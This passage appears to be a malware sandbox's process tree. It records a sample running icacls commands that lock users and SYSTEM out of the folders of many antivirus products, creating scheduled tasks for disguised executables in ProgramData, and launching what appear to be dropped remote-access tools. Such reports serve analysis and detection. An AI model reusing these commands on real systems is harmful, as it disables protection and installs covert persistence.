                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                          PID:1036
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:3024
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                            icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                            PID:2836
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:2652
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                              icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                              PID:2124
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:2516
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                PID:1832
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:2132
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                  icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                  PID:1560
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:2176
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                    PID:1104
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:2492
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                      icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                      PID:2784
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:2716
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                        icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                        PID:1512
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:2300
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                          icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                          PID:2864
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:2384
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                            icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                            PID:2868
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:584
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                              icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                              PID:1948
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:2464
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                PID:324
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:1972
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                  icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:2508
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:2788
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                    PID:1652
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:2328
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                      PID:2888
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:2552
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                        icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                        PID:2148
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:1116
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                          icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                          PID:2476
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:1724
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                            icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                            PID:2852
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:828
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                              icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                              PID:2652
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:2280
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                PID:1552
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:932
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                  icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                  PID:2492
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:784
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                    icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                    PID:1504
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:2924
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                      icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                      PID:2644
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:1656
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                        icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                        PID:2044
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:2460
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                          icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                          PID:2876
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:2596
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                            icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                            PID:1960
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:108
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                              icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                              PID:2148
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:1128
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                PID:1668
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                              PID:1560
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                              PID:2308
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "-2133099803206198858517174631871426464833-10960431111375618003-14978067191366031284"
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:1016
                                                                                                                                                                                                                                                                                            • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                              C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                              PID:2380
                                                                                                                                                                                                                                                                                              • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                PID:2728
                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                  C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                  PID:2036
                                                                                                                                                                                                                                                                                              • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                PID:2000
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "10353817462147174483-714848179-4779443991341471700-166770424021457074971567296207"
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:2496
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "2092060369-1062157191461089382300381257158253191168255838-1129338180-1320125821"
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:2544
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "1574590004561910166-187354188816839939979025940-1852635596212006737234082182"
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:2872
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "5287247158089540-5255966621685800757235953891-7194508511379159619-1481195915"
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:1996
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "-1444793269-210432750836120925610746538541677455548-1771944145-6399943622004858953"
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:2776
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "-428712576202607927355284610-1437936004-160631896319960629132058243057-1155657386"
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:1264
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "20049096051025234728-21387343047721224911131857728-1029093376-718586621-326576182"
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:1160
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "-93296470-435819443-1648287970-151612414-7465830929333549132076913167-546130476"
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:2244
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "596774824427397957855693061-350251315-119497742417915154681974430418-1303507454"
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:1988
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "943240922-126595956916461782111933009434-111269411-825314870154178692164020828"
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:1608
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:1780
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "11869462929362464354728542-752537096-1188117460-680820748-402147791-1441515148"
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:2160
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "810510277-1020763841726367144897743833113624210317558294005122118541490226200"
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:2064
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "1875103378-1851246436-88178471-1909410177664333807-470494165-156033974529994459"
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:1580
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "12538540781680612765-16248663251883071426455106882-1733260165-20777534242069941212"
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:2536
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "-972171622-296187120-287219031144423533102181310-2539396901042362165-548932387"
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:2312
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "19764111281637447689-2053182588-555422563-763175169-1483504619-1415620068-198880488"
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:1852
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "2021093906-826693915992894082984008279-1862272285-33523309513161929231399173698"
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:468
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "773022523-884023103-344137755274807683864372982292425216975994351049404024"
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:240
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:284
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k NetworkService
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: LoadsDriver
                                                                                                                                                                                                                                                                                                                                      PID:2856
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "-324208991-70372433-1678335134-1909162472-1842494530-213213742716106252871799990300"
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:1748
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "-44306829613875148081567689705-1694927773-669319774-1521070379-305660434-748553832"
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:2088
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "199691551711431122331791201937-2003309611-825421883-387532630310057779-1949767463"
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:828
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "76926987413884218415287467831466868963-715126283-1476953990-50192963-1968172877"
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:2260
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                                                                                                                                                              taskeng.exe {D968A45E-645A-479B-A5A0-CCCCCF57F3CE} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:1624
                                                                                                                                                                                                                                                                                                                                                • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  PID:2520
                                                                                                                                                                                                                                                                                                                                                • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  PID:2868
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\taskmgr.exe"
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
